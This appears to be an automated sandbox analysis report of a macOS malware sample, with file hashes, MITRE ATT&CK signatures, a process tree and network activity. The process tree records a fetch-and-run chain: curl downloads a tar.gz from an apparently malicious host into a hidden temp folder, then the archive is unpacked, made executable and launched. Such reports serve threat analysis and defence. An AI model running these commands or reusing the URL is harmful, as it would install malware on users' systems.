Analysis

  • max time kernel
    38s
  • max time network
    126s
  • platform
    macos-10.15_amd64
  • resource
    macos-20241106-en
  • resource tags

    arch:amd64 arch:i386 image:macos-20241106-en kernel:19b77a locale:en-us os:macos-10.15-amd64 system
  • submitted
    17/02/2025, 18:06 UTC

General

  • Target

    Macos-Malware-Samples-main/0333434276741185b03d6a1ec4c97a49a34d73bf9138d5d039bd5cb96b8a248d

  • Size

    48KB

  • MD5

    f1abdc7426dab256d30da578de73cb9d

  • SHA1

    3219d1b92dada589839cabc5e546561f51ddfe82

  • SHA256

    0333434276741185b03d6a1ec4c97a49a34d73bf9138d5d039bd5cb96b8a248d

  • SHA512

    78b001ec08203b65f38cbc5fa05774b8dfd972f3f8096f5f31132d78906c73d39d59515d51cec0873ca011da68096ae650f6be566eaf3403b2d1ab7cbfa48f53

  • SSDEEP

    1536:cwBxH+LbSTkGJskNYKpfAtcMi7LqK24QIAtAmL:VZ+LbLEjhMcMi7uK21Ttl

Malware Config

Signatures

  • Exfiltration Over Alternative Protocol 1 TTPs 1 IoCs

    Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel.

  • File Permission 1 TTPs

    Adversaries may modify file permissions/attributes to evade access control lists (ACLs) and access protected files.

  • Resource Forking 1 TTPs 1 IoCs

    Adversaries may abuse resource forks to hide malicious code or executables to evade detection and bypass security applications. A resource fork provides applications a structured way to store resources such as thumbnail images, menu definitions, icons, dialog boxes, and code.

  • Command and Scripting Interpreter 1 TTPs

    Adversaries may abuse Unix shell commands and scripts for execution.

Processes

  • /bin/sh
    sh -c "sudo /bin/zsh -c \"/Users/run/Macos-Malware-Samples-main/0333434276741185b03d6a1ec4c97a49a34d73bf9138d5d039bd5cb96b8a248d\""
    1⤵
      PID:484
    • /bin/bash
      sh -c "sudo /bin/zsh -c \"/Users/run/Macos-Malware-Samples-main/0333434276741185b03d6a1ec4c97a49a34d73bf9138d5d039bd5cb96b8a248d\""
      1⤵
        PID:484
      • /usr/bin/sudo
        sudo /bin/zsh -c /Users/run/Macos-Malware-Samples-main/0333434276741185b03d6a1ec4c97a49a34d73bf9138d5d039bd5cb96b8a248d
        1⤵
          PID:484
          • /bin/zsh
            /bin/zsh -c /Users/run/Macos-Malware-Samples-main/0333434276741185b03d6a1ec4c97a49a34d73bf9138d5d039bd5cb96b8a248d
            2⤵
              PID:485
            • /Users/run/Macos-Malware-Samples-main/0333434276741185b03d6a1ec4c97a49a34d73bf9138d5d039bd5cb96b8a248d
              /Users/run/Macos-Malware-Samples-main/0333434276741185b03d6a1ec4c97a49a34d73bf9138d5d039bd5cb96b8a248d
              2⤵
                PID:485
                • /usr/bin/python
                  /usr/bin/python -
                  3⤵
                    PID:486
                  • /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python
                    /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python -
                    3⤵
                      PID:486
                      • /usr/bin/curl
                        /usr/bin/curl -qsL -m 1200 "http://bghui.storeyourstreams.xyz/tr/ioffers.tar.gz?ts=1739844739" -o /private/tmp/.mmstmp//stmp.tar.gz
                        4⤵
                          PID:487
                  • /bin/sh
                    sh -c "/usr/bin/tar -xvzf /private/tmp/.mmstmp//stmp.tar.gz -C /private/tmp/.mmstmp/"
                    1⤵
                      PID:490
                    • /bin/bash
                      sh -c "/usr/bin/tar -xvzf /private/tmp/.mmstmp//stmp.tar.gz -C /private/tmp/.mmstmp/"
                      1⤵
                        PID:490
                      • /usr/bin/tar
                        /usr/bin/tar -xvzf /private/tmp/.mmstmp//stmp.tar.gz -C /private/tmp/.mmstmp/
                        1⤵
                          PID:490
                        • /bin/sh
                          sh -c "/bin/chmod +x '/private/tmp/.mmstmp//mm-install-macos.app/Contents/MacOS/mm-install-macos'"
                          1⤵
                            PID:491
                          • /bin/bash
                            sh -c "/bin/chmod +x '/private/tmp/.mmstmp//mm-install-macos.app/Contents/MacOS/mm-install-macos'"
                            1⤵
                              PID:491
                            • /bin/chmod
                              /bin/chmod +x /private/tmp/.mmstmp//mm-install-macos.app/Contents/MacOS/mm-install-macos
                              1⤵
                                PID:491
                              • /bin/sh
                                sh -c "'/private/tmp/.mmstmp//mm-install-macos.app/Contents/MacOS/mm-install-macos'"
                                1⤵
                                  PID:492
                                • /bin/bash
                                  sh -c "'/private/tmp/.mmstmp//mm-install-macos.app/Contents/MacOS/mm-install-macos'"
                                  1⤵
                                    PID:492
                                  • /private/tmp/.mmstmp//mm-install-macos.app/Contents/MacOS/mm-install-macos
                                    /private/tmp/.mmstmp//mm-install-macos.app/Contents/MacOS/mm-install-macos
                                    1⤵
                                      PID:492
                                    • /usr/libexec/xpcproxy
                                      xpcproxy com.apple.nsurlstoraged
                                      1⤵
                                        PID:493
                                      • /usr/libexec/nsurlstoraged
                                        /usr/libexec/nsurlstoraged --privileged
                                        1⤵
                                          PID:493

Network

  • flag-us
    DNS
    bghui.storeyourstreams.xyz
    Remote address:
    8.8.8.8:53
    Request
    bghui.storeyourstreams.xyz
    IN A
    Response
  • flag-us
    DNS
    bghui.storeyourstreams.xyz
    Remote address:
    8.8.8.8:53
    Request
    bghui.storeyourstreams.xyz
    IN A
  No results found
  • 8.8.8.8:53
    bghui.storeyourstreams.xyz
    dns
    144 B
    137 B
    2
    1

    DNS Request

    bghui.storeyourstreams.xyz

    DNS Request

    bghui.storeyourstreams.xyz

MITRE ATT&CK Enterprise v15

Downloads

  • /var/db/nsurlstoraged/dafsaData.bin

    Filesize

    54KB

    MD5

    64f469698e53d0c828b7f90acd306082

    SHA1

    bcc041b3849e1b0b4104ffeb46002207eeac54f3

    SHA256

    d74d0e429343f5e1b3e0b9437e048917c4343a30cff068739ea898bad8e37ffd

    SHA512

    a8334d1304f2fbd32cfd0ca35c289a45c450746cf3be57170cbbe87b723b1910c2e950a73c1fb82de9dc5ed623166d339a05fec3d78b861a9254dc2cb51fab5f
